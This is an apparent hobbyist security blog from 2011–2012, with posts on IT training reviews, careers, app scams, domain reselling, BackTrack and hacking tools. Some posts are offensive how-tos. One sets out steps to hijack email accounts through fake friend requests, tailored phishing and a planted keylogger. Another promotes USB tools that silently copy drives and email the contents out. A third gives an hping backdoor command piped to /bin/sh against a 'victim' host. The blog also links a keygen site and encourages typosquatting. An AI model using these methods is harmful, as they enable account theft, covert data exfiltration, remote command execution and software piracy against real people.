Hack The World

Jodo Institute best for CEH and Networking courses| A honest review

2012-02-02T21:13:00.000-08:00

Hi guys, Most of the students wants to appear for CEH as they complete their B-Tech or MCA. But if you want to appear in CEH exams you need to have 2 years of working experience of any it security profile. But jodo institute is offering CEH course without any of these requirements . First let's read what they are saying..

"Jodo Institute is one of the best Networking and Network Security Institute with Boot Camp MCSE and Boot Camp CCNA training classes. It runs with ISO 9001:2000 Certification. Jodo Institute is an Authorized Training Partner of EC-Council and Microsoft Gold Certified Partner."

And if i am not wrong its the only institute that is authorized to provide CEH training and can conduct certification exam without any prerequisite , So you can join it anytime, fees is very low anyone can afford and you will not see these guys on any ads because they are not charging a extra penny from you.

I went there for 6 days only for a boot camp everything that i saw and observed overthere i am going to share with you guys.

Training staff- All people are well trained and have enough experience of IT industry. You will get the full reimbursement of your money in the form of knowledge.

Facilities- Everything from a little mouse to router works in fine condition, you need not to worry about that. They have a well maintained lab for your practicals, so you can get hands on knowledge.

Fees- Lesser than others, but no compromise with quality. They also has installments facility.

Availability- JODO has a limited branches and as i can see they are not planning to expand themselves because from the last one year they didn't opened any new branch.

Placement- Any institute can provide you placement assistance and no one can provide because your future is in your hands.

Angry birds i met was fraud'

2012-01-30T01:42:00.000-08:00

Android users need to take care while purchasing apps, A bunch of fake apps is available on internet to make you fool. Everything will the same as you find in official website, developer name, all description, and maybe the official website name will be mentioned. But after paying when it will not get installed that time you came to know what happened and you will try to remember from where i have purchased, you have all the details but you cant get refund , because you have been cheated. Apps are being sold by using developers name who never created these apps.

Example- Some apps which was not created by Angry Birds developer Rovio but being sold by using Rovio name-

Alive 4 Ever

Call of Duty Zombies

Angry Birds 3D

Zombieville

Zombie Highway

Tiny Wings

Catch the Candy

Cut the Rope: Holiday Gift

Rat on a Skateboard

Zombie Gunship

Resident Evil 4

Siege Hero

Best place to purchase Android apps is Android market place, Don't believe anyone until it's not verified or authorised by its developer, like in case of Android only use the market to purchase apps which is verified and announced secure by Google. Before purchasing read the review, if there is no review or the app is new search it on Google. If all the reviews are positive, there can be some fraud. Android is the hot selling smart phone and now it has a huge user base. It is being targeted like Windows, Most of the viruses are being created for windows and if we talk about the smart phone, you are smart enough to understand.

Why domain reselling is the most profitable business on internet

2012-01-28T09:23:00.000-08:00

Hi guys, first of all we need to understand what is a domain to know all about these.
WHAT IS DOMAIN- A domain name is an identification string that defines a realm of administrative autonomy, authority, or control in the Internet. Domain names are formed by the rules and procedures of the Domain Name System (DNS).
Domain names are used in various networking contexts and application-specific naming and addressing purposes. In general, a domain name represents an Internet Protocol (IP) resource, such as a personal computer used to access the Internet, a server computer hosting a web site, or the web site itself or any other service communicated via the Internet.
Domain names are organized in subordinate levels (subdomains) of the DNS root domain, which is nameless. The first-level set of domain names are the top-level domains (TLDs), including the generic top-level domains (gTLDs), such as the prominent domains com, net and org, and the country code top-level domains (ccTLDs). Below these top-level domains in the DNS hierarchy are the second-level and third-level domain names that are typically open for reservation by end-users that wish to connect local area networks to the Internet, create other publicly accessible Internet resources or run web sites. The registration of these domain names is usually administered by domain name registrars who sell their services to the public. Info source

Now comes to the main topic, these days every thing, every person, every second product , every organization, every country and all every needs a website and for website they need a domain, not only a domain but a first level or second level domain. What domain reseller do, when they see something is going to be popular and company who own the thing will be make a website on that, they purchase the domain, Now when the company wakes up after a long time all the first level domain and second level domain will be show sold out. Now they will try to contact the person who owns this domain and that person will ask for the higher amount and company is helpless, respect matters in market when you have a plenty of competitor.

Now what you guys can do, you need not to invest too much in this business you just need to keep your eyes on the market whats going on , whats going to be popular, whats going to become a hot seller . just purchase that by investing 400 to 500 rs per year and the results will be unbelievable . It has one more advantage for example google.com is a popular site, but when people try to write the website name sometimes they do the mistakes and they can type goole.com, gogle.com, googl.com , thing if every person will do this mistake once in a week how many previews are these sites getting. Advertisement on these sites could be a chance to earn big amounts by google or any other ad company.

top five jobs where you don't require to work under a boss

2012-01-27T09:13:00.000-08:00

Hey guys, just left my job and coming back to my blog, because love is after all love and work is work. Well i can work under pressure but cant work under a boss, and if you are working somewhere there will be a boss who sucks your blood just like a vampire. Even they don't do anything apart from sitting in their cabin and talking over the phone, but when in meeting it looks like they have done all the work and others spent their whole month in sleeping at their desk.

Here are some work ideas where you can earn a lot with some creativity and without any pressure or deadlines, although deadlines always motivate people but sometimes it becomes suicidal . If your boss or colleagues are not.... As you know i am a tech guy so these ideas are not for non tech
(1)Hacker- Being a ethical hacker or black hat hacker can give you more and more money, ethical can get fame also. Everyone knows that most of the organizations are hiring hackers to check their security systems and their softwares vulnerabilities . Government also need their support to track cyber crime and terrorist activities. Even we have got a great response from girls also, they also like to date hackers, sorry they are crazy about this. You can get a lot of contract and working freelance without any office timing and without any stress is full of fun.
(2)Teacher- The all time respected and meaning full job, spreading awareness to people and sharing your knowledge to others is the finest work in the world. If you are a social creature and find fun in meeting with new people that job can make your dreams come true. The most hated thing in this job as i know is teaching children , I can't tolerate them they will never sit quiet. This job is considered to be one of the most respectable professions and you can even fondly teach your way till old age. For tech guys there is a suggestion if you are sound in your subject its okkay but if you have knowledge of 2-3 languages you will be the only one earning highest in your profession.
(3)Writer- Writer's job can be too much boring or can be full of fun, depends upon your writing methodology, A person can write in a crowded place better or other one needs a calm place to write their thoughts. Well the independence a writer needs they can not get while working with an organization. You should keep in touch with company but don't sign the contracts that destroy your skills. Anyone can be a part time content writer and can earn a higher amount with work at home facility. You can have your own website, your own blog, your own e-magazine or monthly paper magazine. Once you get the name you need not to anywhere just purchase a blackberry so you can get your client's email and phone calls.
(4)Consultant- Well some people says to be a consultant you should be brilliant or a fool. Because every second person coming to you has their own mind and in which they have their own idea but they are afraid of failure . They want someone who is considered shrewdly to get a stamp of correct on their decision. So need not to do anything just help them to choose what is right for them. And the whole city will be in your office once you got a big client and you make him satisfied.
(5)CEO_MD_COO- Working for your own business is the best way to get instant success in your life. When you will come tired at home their will be one thing that make you relax is you worked for your own. Not for a company which can kick your ass on a small mistake even you sacrificed many of your years for them. What about the money i am 200% sure if you use a 5% of your mind you can earn triple of your income
with less stress and physical and mental activities.
I know that everyone can't do this and if they will who will work but the people who have some self respect and they are accused of nose breaking of their boss will find these ideas interesting.

Ban on Google is not good for freedom of speech

2012-01-16T09:35:00.000-08:00

Hi folks, From the last few day news is being shown on tv channel and on being published on internet and in newspapers, that indian government has warned google and some other site if they will not remove some appropriate things from their sites , their sites will be banned in india like china. I am not in favor of placing any offensive or religious content on internet. But if we talk about google its a search engine and works on the keywords basis, they cant read and moderate every webpage, More than i learned in school i learned from google , and its capability of searching anything through any keyword makes it the most popular and used search engine. As i know and consider from the starting google is trying to make their sites and service improved . Ban on google is an attack of freedom of speech and its not good for free internet. Guys if you support my words and supports Google do read and comment.

How to get great discount in online shopping | Shoping hack

2012-01-15T00:35:00.000-08:00

Hi guys, Now a days everyone prefers to do online shopping , Let's suppose friends are at home, starving but not willing to go outside -Order a pizza as you are a netbuddy you will place order on website you will place your order on website not over the phone and this can give you great discounts, Just search on google with the format- company name(BRAND NAME) discount coupons, you will found several website showing coupons . And that all for you . Some people have the websites or blogs to share coupons and some great people are uploading the coupons which they have already used. Lets go for another example if you have to purchase a mobile phone online which will cost you 10000 rs and before placing the order if you will search for the discount coupons or promo codes and if gives you 1000 rs off- not a bad idea. So moral of the story If going to order anything online, just search once if you can avail any discount without having the eligibility of discount is called the hacking.

BackTrack 5 Countdown | Time to release

2011-05-01T11:02:00.000-07:00

BackTrack 5 is going to release and its going to rock & hack again. Thanks to BackTrack-Linux.org for giving us such a great thing.

BackTrack 5 will be based on Ubuntu Lucid (10.04 LTS), and will (finally) support both 32 bit and 64 bit architectures. We will be officially supporting KDE 4, Gnome and Fluxbox while providing users streamlined ISO downloads of each Desktop Environment (DE). Tool integration from our repositories will be seamless with all our supported DE’s, including the specific DE menu structure.

Perhaps most importantly BackTrack 5 “revolution” will be our first release to include full source code in it’s repositories. This is a big thing for us, as it officially joins us to the open-source community and clears up any licensing issues which were present in BackTrack 4.The absence of source code availability in BT4 was mainly due to lack of resources when we initially structured the BT4 development environment. Newly armed with our support from Offensive Security, we have now built a *proper* development environment, which allows us to do some pretty awesome things.Our tool list has completely been revamped and refreshed. Each tool’s functionality was assessed and decided upon before inclusion to BT5. Obviously, we are constantly staying up to date with interesting new tools and are adding them to our repositories when appropriate. In addition, our menu structure has been much optimized – streamlined with both the PTES and OSSTMM standards. This will make finding and using the right tools much easier.We are finally able to update our roadmap and pin down a date for the release – May 10th, 2011. Information Source

What can make you different from other | Career Tips

2011-04-21T13:21:00.000-07:00

Hi, Yesterday I came back from kanpur. I went their for my exam , I came back by bus. The bus i was sitting was full of B.Tech students, I gave my introduction and took their. I asked them about their specialization and aims. Everyone wants to be a software developer and they are working on .net .....LOL
That the only reason they wander for job and get a low profile job because they are only doing B.Tech to get a job , Not for their research not for their own will and not for anything else, They are not exited after B.Tech they will be able to make, test and penetrate softwares, They are willing to get a job only and after waisting 4-5 years , after waisting 6-10 lacks they get only 5-6k p/m only.
If you don't want to face all these change yourself now , don't study for study for the subject you are interested only.
Everyone is behind .net Why don't you think about python
Everyone is behind PHP Why don't you think about jsp
Everyone is behind Facebook Why you can't create your own social network
Everyone is behind a JOB have you done your studies to become a servent
Everyone is behind Windows Don't you ever think there are others cheaper then windows
Everyone wants to learn windows server Do you think other are worst
Everyone is behind the money don't you think you are running away from perfection
Well I can suggest you only , Its your life and Its your decision ...............Keep Reading

Wordpress.com Hacked | Who is secure?

2011-04-14T12:14:00.000-07:00

Hi friends, R@t is here to destroy every computer....

Today morning when i was searching for hot news i found a surprising news wordpress.com rootserver hacked. The question is who is secure when wordpress is not yo

u can read full statement which was posted by Matt Mullenweg in a blog post http://en.blog.wordpress.com/2011/04/13/security/ or here

Tough note to communicate today: Automattic had a low-level (roo

t) break-in to several of our servers, and potentially anything on those servers could have been revealed.

We have been diligently reviewing logs and records about the break-in to determine the extent of the information exposed, and re-securing avenues used to gain access. We presume our source code was exposed and copied. While much of our code is Open Source, there are sensitive bits of our and our partners’ code. Beyond that, however, it appears information disclosed was limited.

Based on what we’ve found, we don’t have any specific suggestions for our users beyond reiterating these security fundamentals:

Use a strong password, meaning something random with numbers and punctuation.
Use different passwords for different sites.
If you have used the same password on different sites, switch it to something more secure.

(Tools like 1Password, LastPass, and KeePass make it easy to keep track of different unique logins.)

Our investigation into this matter is ongoing and will take time to complete. As I said above, we’ve taken comprehensive steps to prevent an incident like this from occurring again. If you have any questions or concerns, please leave a comment below or contact our support.

How to use multiple operating systems in one computer

2011-04-07T12:37:00.000-07:00

Hi friends ! Hope you are chilling ..... But i am getting bored with my job and without you everything looks like useless_ _ _ Don't worry doing emotional atyachar only. Have nothing to write but worried about my website traffic and adsense earning so going to write i mean to say copy most worst article of this website. Well most of you have heard about VMware but duffers(LOL) i have used it so i have more knowledge. Its very usefull for students, developers and testers to create virtual environment for multiple operating systems. But some suckers(LOL) don't know how to use it and why use it.

How to use it- not going to tell you step by step but after installing it you can create a machine with any operating system but not MAC . To use multiple operating system at one time you need to create ISO images of these operating systems. After then you can create team and use all system in one computer at one time.
Why use it- Several reasons for this

No need to use more then one PC or Laptop
Can run old softwares on latest operating systems
Support both windows and linux operating systems
Consumes less memory and RAM
Can create a Network like LAN
Can create a Network with different operating systems
Easy to remove or install an operating system
Good for testing softwares and operating system
Hacking practicals without doing any harm to original operating system
Can mount ISO files so no need to use CD or DVD's

What is VMware workstation-VMware Workstation is a virtual machine software suite for x86 and x86-64 computers from VMware, a division of EMC Corporation which allows users to set up multiple x86 and x86-64 virtual computers and to use one or more of these virtual machines simultaneously with the hosting operating system. Each virtual machine instance can execute its own guest operating system, including Windows, Linux, BSD variants, and others. In simple terms, VMware Workstation allows one physical machine to run multiple operating systems simultaneously. Other VMware products help manage or migrate VMware virtual machines across multiple host machines. Workstation is sold by VMware; VMware Player is a similar program with fewer features supplied free of charge.
VMware Workstation supports bridging to existing host network adapters, CD-ROM devices, hard disk drives, and USBdevices (including USB Isochronous devices such as webcams, microphones etc), and provides the ability to simulate some hardware. For example, it can mount an ISO file as a CD-ROM, and .vmdk files as hard disks, and can configure its network adapter driver to use network address translation (NAT) through the host machine rather than bridging through it (which would require an IP address for each guest machine on the host network).
VMware Workstation allows the testing of live CDs without first recording them onto physical discs or rebooting the computer. Multiple successive snapshots of an operating system running under VMware Workstation can be taken, and the virtual machine can be restarted in the state it was in when any snapshot was saved. This is useful for software developers and testers, for environments at risk from virus infection, and for demonstrating software.
VMware Workstation includes the ability to designate multiple virtual machines as a team which administrators can then power on and off, suspend, and resume as a single object, making it particularly useful for testing client-server environments. Information Source

Now you want to use it for study purpose but don't have a key then this site will help you http://www.keygenguru.com/

Why I Love Blogger | New Dynamic View Launched

2011-04-03T20:32:00.000-07:00

Hi friends, First of all i want to say thanks to Dhoni and Team india to give a chance to drink all night; 4 baj gaye per party abhi baki hai. Well first I start my blogging career on Wordpress but that time i didn't know about PHP or any other scripting and had very little knowledge and awareness about security , so as you understand it got hacked within two months, that time i moved to blogger and I am just becoming a bigger fan of its services.
The first good thing about Blogger it's free, it's easy to use, It's secure then any other service, and you no need to think about new ideas and gadgets. Google always work on them. After i started on blogger they released template designer, recent post gadget, popular post, and total visits gadget. After some days the awesome feature stats released. Comment moderation and Mobile view, and now blogger has released dynamic view.
Although these views are not available for HackTheWorld without pawan's permission but as soon as he will be free , we will try to try.....

Blogger currently offers five dynamic views for its public blogs. These views are only accessible if allowed for by the blog author.
Flipcard: available at [blogURL]/view/flipcard
Mosaic: available at [blogURL]/view/mosaic
Sidebar: available at [blogURL]/view/sidebar
Snapshot: available at [blogURL]/view/snapshot
Timeslide: available at [blogURL]/view/timeslide

As an example, the URL for accessing the Sidebar view for Blogger Buzz would be http://buzz.blogspot.com/view/sidebar.

These views require modern browsers such as Internet Explorer 8+, Firefox 3.5+, Chrome or Safari. Many elements of these views will not work should you have an older browser.

In all views, search is available in the upper right hand corner. Clicking on the ">" arrow in the very top left of the header bar will slide the header bar across and allow you to choose different views for the current blog as well as type in a new blog URL.

Flipcard

Mouse over any of the cards to see the post title and comment count. As you scroll down, additional posts will continue to load.
Click on a card to see the post in full view. You can navigate through the posts using J (older post) and K (newer post) or the arrow keys. Hit escape or click Back to all posts to return to the Flipcard view.
In the upper left, click to sort by Date, Author and Category.

Mosaic

Clicking on an individual tile will expand that post to the full width of the view, and clicking again will collapse the post back into its original position.
The exact position of the tiles is randomly determined each time the blog loads, but they will appear chronologically from top left to bottom right.
Once a tile is expanded, you can page down by using the "up" and "down" arrow keys as well as J and K.
This view is optimized for the tablet viewing, and supports screen rotation.

Sidebar

Optimized for quick reading and browsing.
Left sidebar is list of chronological posts, with comment counts and thumbnails for individual posts.
J and K arrow keys will navigate through the posts, and comments can be displayed on the same page by clicking the Show link.

Snapshot

This view will display only the posts which have images.
Clicking through any photo will display the full post page, with naviagtion links at the bottom for Newer and Older posts
Mousing over any photo will display a post snippet

Timeslide

This view breaks the blog content down into three different areas:
- Left column: Enlarged picture with a post snippet, title, and snipppet displayed in chronological order
- Middle column: Displays just the post title and snippet
- Right column: Displays just the individual post titles
When searching for posts in this view, the results will be highlighted.

How to become a professional hacker | career in Ethical Hacking

2011-03-27T02:32:00.000-07:00

Hi friends, Like others I will not talk about going to launch a magazine, please subscribe this, In the world of computer and Internet i will not make a plan to sell a paper made magazine. I am very angry with people who call themselves hacker, even they don't know coding, Everyone is a hacker who can exploit something. I will not say i have created a hacking videos toolkit, this is awesome and available at discounted prizes for some days, Making people fool before first April is not my hobby. I will not use mumbai terrorist attack photos to get traffic,I will not promote a worst product to earn affiliate commission, or write a paid review about a product or company.
Don't you people think all this is sucking and you are fed up with all this.
I'll disclose only secrets that no one disclose. Not in this post but in my next post, truth about the security and hacking business.
I got a lot of questions from my readers that they worked hard on Internet to get deep knowledge about hacking and security but don't have a certification in hacking. They worked hard but unable to find which job profile suit them best.First of all if you talk about working in a security firm as a professional hacker, you need to know how to become a professional hacker.
There are some steps to do this--
(1) Need a mindset/premindset to exploit things even its a human mind, computer or electric appliance
(2) Sound knowledge of operating systems, application software, Internet and hardware
(3) Every wanna be professional hacker should be perfect in at least one programming language
(4) They should have basic knowledge of networking, routers and servers.
(5) Knowledge of database management is must
(6) knowledge of One web designing language and one server side srcipting language.
(7) CEH certificate or a local vendor certification can also work.
(8) Over confident, Rude behaviour and Attitude, use of abusive words can help you finding a good job( Ha...Ha...Ha)

If you have these seven things no one can stop you becoming a hacker, now your skills depends on your hard work but when you are going to join a organization as a professional hacker or security expert these basic things are needed, other professional techniques you will learn in the company's training room only.At that place a hardcore hacker get to know he knows nothing about hacking.
Now the question comes in which field i can make my career. Here i want to present an example, some of my friends was good in electronics, but at the time they was going to take admission in B.Tech they thought It market is growing day by day, providing attractive salary packages and have a glamours career. So they took computers and now you can understand in which situation they are living....Jobless, Hopeless and aimless.
So friends never study subject in demand, study which you find interesting.
(1) If you work good as a web developer , make yourself perfect in that type of hacking techniques.
(2) If programming, take a move to pen-testing
(3) If networking, take a move to network security
(4) If you feel you can hack human minds easily, go to social engineering
(5) Having security approach in your mind can also make you a good programmer
(6) If you are operating system worm, that can make you system security engineer
(7) Other than that if your area of interest are mobile, bluetooth or voip they also have a hot career.
Choose one , make a group and start Hacking

How professional hackers hack e-mail accounts and social networking accounts

2011-03-17T22:02:00.000-07:00

Hi friends, Sorry for the late , But from now i will try to publish 2 or 3 post in a week. Today i am going to reveal the secret how professional hackers hack e-mail ids and social networking accounts.

Theses professional receives upto $1000 for hacking a e-mail account. There is no special software or hidden technology behind this work. A normal computer user can do this with a little effort. First i want to clear one thing any software cannot disclose password of any e-mail address. ( Or if it can incase i don't know about it then i am sure only few companies can afford this software) Well I know you have seen a lot of website with advertisement " Get any e-mail account password guaranteed , Only $50 or more". Today i am going to disclose how they do all this.
There are some steps to hack e-mail accounts, but getting password of a e-mail user is totally depends on the user's unawareness.
(1) Gather e-mail address and other details( If possible).
(2)Now suppose you don't know who owns this e-mail address, Open Google and search e-mail id if e-mail id will be on any open web page, you can find a lot of information about that user, For example- Their name, city, interests, hobbies, likes, dislikes and social network links also.

(3)If you have got sufficient information about the user then we will move to next step and skip this. If not open facebook and twitter or if from India don't forget the Orkut, search that person and try to make them friend with a fake account.

(4)Now you have a lot of information about that person. Make a fake mail advertisement with a phishing link and send to that e-mail id. Make sure your fake mail content matches with that person's interests. Here your social networking friendship can work , try to convince that person for clicking on the phish link.
(5)Now if 4th step doesn't work for you, trace that person's location, operating system and browsers. Here e-mail tracker pro, wordpress blog or readnotify can help you better. Make a remotely executable keylogger engine and send the download link or file to victim, Here you need to show how much you had studied at psychology classes.

If you follow these five steps there are 90% chances you can hack any normal or advanced computer users e-mail address. So hope now you know its only a social engineering trick not anything else.

Innobuzz ethical hacking training : A honest review

2011-02-27T01:37:00.000-08:00

Hey folks, Sunday morning! what's going on..... Let me guess you are watching any movie like me or trying to do some HackStunts. Well Two days before i shifted to Noida because i found it more advanced and peaceful than Delhi.

Some days before i got an invitation from Innobuzz Knowledge Solutions to take a special class on social engineering attacks.I got this opportunity because in my last job i was the part of my company's social engineering team. ( Ooo... my 3 years experience finally worked ) In my previous posts i told you that i had sent some mails to get some free classes over there, but no one replied. So it was a opportunity for me to know what they are really doing. It was a three hour training session and i can say it was a amazing experience.

Students were technically sound more than i expected and they had a lot of question also. I learned a lot of new things from them. In lunch time i tried to get students opinion about the facilities and it was not bad.

I am going to categorize every thing so it will be easy to give points after review.

Content Quality-
After all this i ordered a course kit you can also apply for a course or study material at their web site, which contains various items including the DVD kit and Book, Hacker T-shirt, etc. The book is Practical and point based. It mostly contains the Key and Important points for each topic with Graphics and hence reading the book is easy. The first thing I did was, I googled to search if the book was copied or ripped, however, it was nice to find out that it was original content written by Innobuzz and I must say I was impressed with the quality. Content was fully practical based so any newbie can also easily understand hacking and security.
Trainer Quality-
Trainer was also a technically sound guy and have a lot of experience of security . He was helpful and prepared to answer all the questions. Well need not to say they are working hard . Considering the price of the training program and upon comparing it will other training programs offered in the market, i found innobuzz to provide great value for money.
Training Support-
Now, this is something which I found out as the most amazing part. I have had Training from Appin and others too, but the management's support and interaction with the customers is great. Normally, most of the Training companies, will forget you once you pay, however, Innobuzz turns out to be different on this front and Tech savvy too. After registration, you get many SMS, Emails and Calls to keep track of your progress and to solve any problems or issues you might have! GREAT customer support. This was awesome. If anyone else has also joined, do mention your response by commenting on this. I dont think i have seen this happening anywhere else.
Infrastructure-
I feel the Infrastructure was decent but they need better chairs ( So healthy people can sit properly and they should extend the classroom sizes.)

Recommendations-
Extending the duration of the course would be better since every student would like to spend more time with the trainer to grasp more. Fee can be increased and I think people are ready to pay more, if they can increase the duration of the training program of CISE.

Points- 8/10 You can visit their website to register for a course http://www.innobuzz.in/

Trace e-mail sender location with ReadNotify

2011-02-20T09:21:00.000-08:00

Hi guys, This time busy in my exams but thanks to sunday no class, less pressure of studies. I got some anonymous comments about the e-mail tracker post. Guys says that free version of e-mail tracker pro doesn't provide exact information and we don't want to purchase paid version because there is no support and updates for paid version. Well i can't say anything about this because i never used E-mail tracker Pro. I use
Read Notify

What is ReadNotify?

ReadNotify is the most powerful and reliable email tracking service that exists today. In short - ReadNotify tells you when email you sent gets read / re-opened / forwarded and so much more.

Simply add: .readnotify.com to the end of your recipients email address

Information you can get with the help of read notify-

Date and time opened

Location of recipient (per their ISP city /town)

Map of location (available on paid subscriptions)

Recipients IP address

Apparent email address of opening (if available)

Referrer details (ie; if accessed via web mail etc)

URL clicks

How long the email was read for

How many times your email was opened

If your email was forwarded, or opened on a different computer

More information you can get from the website, And there is nothing that is complicated i use it and find exact information always.Read notify also provides paid services. For more and better information visit www.readnotify.com------------------------ Keep hacking...............

USB hacking tools exposed

2011-02-01T10:06:00.000-08:00

Hey friends, what's going on Well i am enjoying my training in Delhi. Today i am going to tell you something about "hacking with USB"

USB Dumper- Usb dumper is a tool for usb hacking. You need to just download and double click on it. After that It copies files silently from any connected Usb. It runs in background and works without the usb user's consent. You can download it from here but your antivirus software will detect it as a harmfull programm.

USB Switchblade- This tool take advantage of microsoft windows security vulnerabilities related to Usb. This tool silently recovers information like Password hashes, LSA secrets, browser history, autofill information, ip information. This tool can also create a backdoor for later access. Download it from here or from here

USB Hacksaw- This hack is based on a modified version of USBDumper. Once installed on a targert machine it will stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the hacksaw will download the contents of the drive to a temporary location using the modified USBDumper, then silently run the send.bat file located in the same directory, which will then archive the contents using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the downloaded data to an email address, and remove the documents and archives.

Download it from here Take care of your antivirus it will detect all three tools as a harmfull software.

Well in my training i got to know about so many tools but because I don't have much time to write a detailed post we will continue all this hack tomorrow. Enjoy..........................

Hacking with linux (Top 5 tools)

2011-01-31T11:09:00.000-08:00

Why Linux-Linux has many types of distribution like redhat, debian, slax etc. Source code of most of the linux is available, easy for application programming and easy to modify. Most of the versions are free of cost and server market share is increasing day by day .Linux is gaining popularity and is fast becoming a stable industry strength OS.

Vulnerability scanner- These tool allow the attacker to connect to a target system and check for such vulnerabilities as configuration errors, default configuration settings that allow attackers access, and the most

recently reported system vulnerabilities. The preferred open-source tool for this is Nessus. Nessus is an

extremely powerful network scanner. It can also be configured to run a variety of attacks.

http://www.nessus.org/nessus/intro.php

Port scanner- Nmap is the best scanning tool for linux. www.insecure.org/nmap

Stealth Scan, TCP SYN
nmap -v -sS 192.168.0.0/24
UDP Scan
nmap -v -sU 192.168.0.0/24
Stealth Scan, No Ping
nmap -v -sS -P0 192.168.0.0/24
Fingerprint
nmap -v -O 192.168.0.0/24 #TCP

Scanlogd - detects and logs TCP port scans. http://www.openwall.com/scanlogd/
Scanlogd only logs port scans. It does not prevent them. You will only receive summarized information in the
system's log.
Abacus Portsentry- http://www.psionic.com/abacus/portsentry/
Portscan detection daemon Portsentry has the ability to detect port scans (including stealth scans) on the
network interfaces of your server. Upon alarm it can block the attacker via hosts.deny, dropped route or
firewall rule.

Hping- hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features. More commonly known for its use as a pinging utility, HPing carries a hidden but handy usage, that is a Backdoor Trojan.
Just enter the following command on your victim
$ ./hping2 -I eth) -9ecc | /bin/sh
Then Telnet into any port of your victim and invoke commands remotely on your victim's host by preceding
any Unix/Linux commands with ecc
$ telnet victim.com 80
$ eccecho This Text imitates a trojan shovel

"While hping was mainly used as a security tool in the past, it can be used in many ways by people that don't care about security to test networks and hosts. A subset of the stuff you can do using hping:

Firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute, under all the supported protocols
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
hping can also be useful to students that are learning TCP/IP.

Hping works on the following unix-like systems: Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows. " From www.hping.org

Working on untangle and backtrack

2011-01-26T02:28:00.000-08:00

Hi folks, As you know right now i am in Delhi for a training. Learning new things, found some good friends and obviously enjoying. My project topics are backtrack and untangle. Hectic schedule and difficult work , i need to work on my networking skills also. Using untangle in vmware because i already installed 4 OS's in my laptop.
Well i don't have much time to write a detailed post but publishing tricks so you can keep yourself busy in my absence. In my previous post i talked about SET here learning advanced use of SET. You can find new kind of phishing Tabnabbing in this kit . Tabnabbing has a additional ability to open fake page when victim opens several tabs, So it makes difficult for them to remember which page they opened. Other than that working on exploits and wi-fi. You can send fake mail, e-mail bomb with this kit.
About untangle- Just go to untangle.com and read , I am also a layman when we come to untangle but now able to configure it. Untangle hacking will take some time. First i need to complete my training.

Untangle provides an open source network gateway for small businesses, schools, and non-profit

organizations. Untangle provides multiple gateway applications installed at the edge of a network.
Untangle provides software in three different packages: Lite, Standard and Premium.

Untangle offers its Lite Package for free, whilst selling its Standard Package or Premium Package on subscription.. Each comprises a collection of Untangle network software applications.
Untangle applications include Anti-spam, Web Content Filtering, Antivirus, Anti-phishing, Anti-spyware, Intrusion prevention, Firewall, OpenVPN, Router, Protocol Control, Attack Blocker, Reporting, Policy Manager, Kaspersky Virus Blocker, Commtouch Spam Booster, ESoft Web Filter, Directory Connector, Captive Portal, Ad Blocker, WAN Balancer, WAN Failover, Bandwidth Control and Branding Manager on the Untangle Gateway Platform.
The company also offers a range of hardware, or appliances, with Untangle Gateway Platform pre-installed.

New link worm on twitter

2011-01-22T23:12:00.000-08:00

Hi friends, Right now in noida, completing my training in It security, working on my own PHP project also, not getting time to write a detailed post or tutorial, but need not to worry i will be back soon with lot of backtracking and attacks, this time trying to crack my apartment's tikona wi-fi. Yesterday my friend told me about the new threat on twitter, I searched Google and found the exact news at naked security.

Thousands of twitter account sending malicious links to others without the permission of their owners. if you click on this link you will be redirected to a fake antivirus site, The site will try to scare you that your system is affected by a virus and pay money to disinfect it.
Infected user are changing their passwords Del Harvey of Twitter's security team has confirmed the problem, and reports that the site is removing the dangerous links and resetting the passwords of compromised accounts.

Awardspace was under heavy ddos flood attack | are you a zombie

2011-01-20T11:26:00.000-08:00

In 2009 twitter was hit by Ddos, in 2010 wikileaks was hit by a Ddos attack to take the site down for sometime, and now a major hosting service Awardspace was hit by Ddos yesterday, group calling themselves Anonymous launched orchestrated DDoS attacks, they took down mastercard, visa and paypal also. The bank post finance who frozan assange's account, post finance site was brought down for 16 hours.
Today when i opened facebook i saw this message at awardspace page

Our service was under heavy DDoS Flood Attack yesterday which lead to breakdown of 6 % of our storage System.

We apologize to all clients which are affected by this.

...We are working on a solution for this and restoring all data. No data will be lost - even if you don't see all your datas in your account right now. Same thing is with your Emails.

Thank you for your patience.

Rising demand of security experts

2011-01-12T02:54:00.000-08:00

The university of Texas San Antonio announced it has received $1.25 Million from the National Science Foundation .

" The University of Texas at San Antonio Computer Science Department has been awarded a new four-year Federal Cyber Service grant from the National Science Foundation to educate graduate and undergraduate students in the area of computer security and information assurance. For 2011-2012, we will be admitting up to six new students into the program.

The Scholarship for Service (SFS) program is funded by NSF and provides up to two years of tuition and support for individuals pursuing a computer security or information assurance program. It requires the recipient to work for the federal government for one year for every year of funding received." Source

Hey its not for all of us, but i just want to spread this message "future is bright for us so be prepared for any type of opportunities, Security experts will be needed for every work that is related to computer or a network. Wars will not be in battle field, Cyber war is going to take place of guns( Good for humanity)
Enhance your skills soon you will receive call from a agency that want to hire you with your terms and condition."

Earn20.com legitimate or scam

2011-01-11T04:32:00.000-08:00

Disclaimer- I Got a call from a number saying i am from earn20.com and asking to deposit money without any verification that looks suspicious and scam. So i am posting my views about the site.

Hi friends, Why you all creating trouble for me someone filled a form at earn20.com with my name and number. Yesterday i got a call- a girl saying we are from earn20.com , you have filled a application form, we have a special offer for you, although our registration fees is 3000 but if you will join today you will have to deposit only 1500. I was surprised why she is calling me , i didn't filled any form. But i asked her what i will get if i join your site. She replied- you get 20 rupees to fill a form, and you have to fill only a name and e-mail address. With this special offer you will get 365 offer which means you will get 40 rupees instead of 20 for 1 year. I said-OK why you need these e-mail ids, she replied- we are collecting these email ids for new websites. I asked her- do you accept paypal ? now the question comes why i asked for paypal( I saw their website while talking to her and found they do not have paypal option , I wanted to get something to trace them) She replied- we don't have paypal option but you can deposit the money in our state bank of india account.I can send you account number by message. I said again OK and disconnected the call. Message from- 8142111***
Thank you. Please deposit Rs 1500/- in SBI A/C No 3037331**** in the name of Ma*** Enterprise, khairatabad branch, hyderabad. IFSC CODE SBIN0003606 I just hide the last digits to protect the privacy of Account holders.
